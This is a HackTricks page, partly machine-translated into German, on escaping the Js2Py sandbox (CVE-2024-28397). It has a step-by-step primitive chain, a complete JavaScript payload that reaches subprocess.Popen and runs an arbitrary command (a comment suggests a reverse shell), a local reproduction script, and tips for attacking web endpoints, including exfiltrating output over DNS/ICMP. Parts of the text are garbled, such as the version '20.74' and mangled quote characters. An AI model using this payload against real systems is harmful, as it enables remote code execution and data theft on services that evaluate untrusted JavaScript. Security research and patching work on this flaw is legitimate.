HackTricks
Js2Py sandbox escape (CVE-2024-28397)
Tip
Lernen & üben Sie AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.
Js2Py übersetzt JavaScript in Python-Objekte, daher kann selbst wenn js2py.disable_pyimport() verwendet wird, untrusted JS durch Python-Interna navigieren, um zu gefährlichen Klassen wie subprocess.Popen zu gelangen. Versionen 20.74 erlauben es, die von Js2Py an JS-Objekte exponierten Python-Reflection-Primitiven zu missbrauchen, um RCE aus sonst “sandboxed” JavaScript zu erhalten.
Primitive: pivot from JS object wrappers to Python objects
- Get a Python-backed object:
Object.getOwnPropertyNames({})returns adict_keysobject in Python space. - Recover attribute access: grab
.__getattribute__from that object and call it to read arbitrary attributes (e.g.,"__class__"). - Climb to
object: from<class 'dict_keys'>read.__base__to reach Python’s baseobject. - Enumerate loaded classes: call
object.__subclasses__()to walk every class already loaded in the interpreter. - Find
subprocess.Popen: recursively search subclasses where__module__ == "subprocess"and__name__ == "Popen". - Execute a command: instantiate Popen with attacker-controlled arguments and invoke
.communicate()to capture output.
Beispiel-Payload, die Js2Py missbraucht, um subprocess.Popen zu erreichen
```javascript // Replace cmd with desired payload (reverse shell / ping / etc.) let cmd = "id"; let hacked, bymarve, n11; let getattr, obj;hacked = Object.getOwnPropertyNames({}); // -> dict_keys([]) bymarve = hacked.getattribute; n11 = bymarve(“getattribute”); // attribute access primitive obj = n11(“class”).base; // pivot to <class ‘object’> getattr = obj.getattribute;
function findpopen(o) { let result; for (let i in o.subclasses()) { let item = o.subclasses()[i]; if (item.module == “subprocess” && item.name == “Popen”) { return item; } if (item.name != “type” && (result = findpopen(item))) { return result; } } }
// Popen(cmd, stdin/out/err pipes…) then .communicate() for output n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate(); console.log(n11); n11; // returned to caller if framework sends eval_js result back
</details>
Warum das funktioniert: Js2Py legt Python-Objekt-Wrapper für JS offen, ohne `__getattribute__`, `__class__`, `__base__` oder `__subclasses__` zu entfernen. `disable_pyimport()` blockiert nur explizites `pyimport`, aber die obige Kette importiert nie etwas Neues; sie verwendet bereits geladene Module und Klassen im Speicher erneut.
## Kette lokal reproduzieren
```bash
# Js2Py 0.74 breaks on Python 3.12/3.13; pin 3.11 for testing
uv run --with js2py==0.74 --python 3.11 python - <<'PY'
import js2py
print(js2py.eval_js("Object.getOwnPropertyNames({})")) # dict_keys([])
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__")) # method-wrapper
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\")"))
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\").__base__"))
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\").__base__.__subclasses__()"))
PY
Angriff auf Web-Sandboxes
- Jeder Endpoint, der von einem Angreifer kontrolliertes JS in
js2py.eval_jseinspeist (z. B. eine Flask/run_codeAPI), ist sofort RCE, wenn der Prozessbenutzer Shell-Zugriff hat. - Das Zurückgeben von
jsonify({'result': result})schlägt fehl, wenn.communicate()Bytes zurückgibt; dekodiere oder leite die Ausgabe über DNS/ICMP, um Serialisierungsblocker zu umgehen. disable_pyimport()beseitigt nicht diese Kette; harte Isolation (separater Prozess/Container) oder das Entfernen von Js2Py-Ausführung für nicht vertrauenswürdigen Code ist erforderlich.
Referenzen
- HTB: CodeTwo write-up (Js2Py CVE-2024-28397 escape)
- Marven11 CVE-2024-28397 Js2Py sandbox escape PoC
Tip
Lernen & üben Sie AWS Hacking:
Lernen & üben Sie GCP Hacking:Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.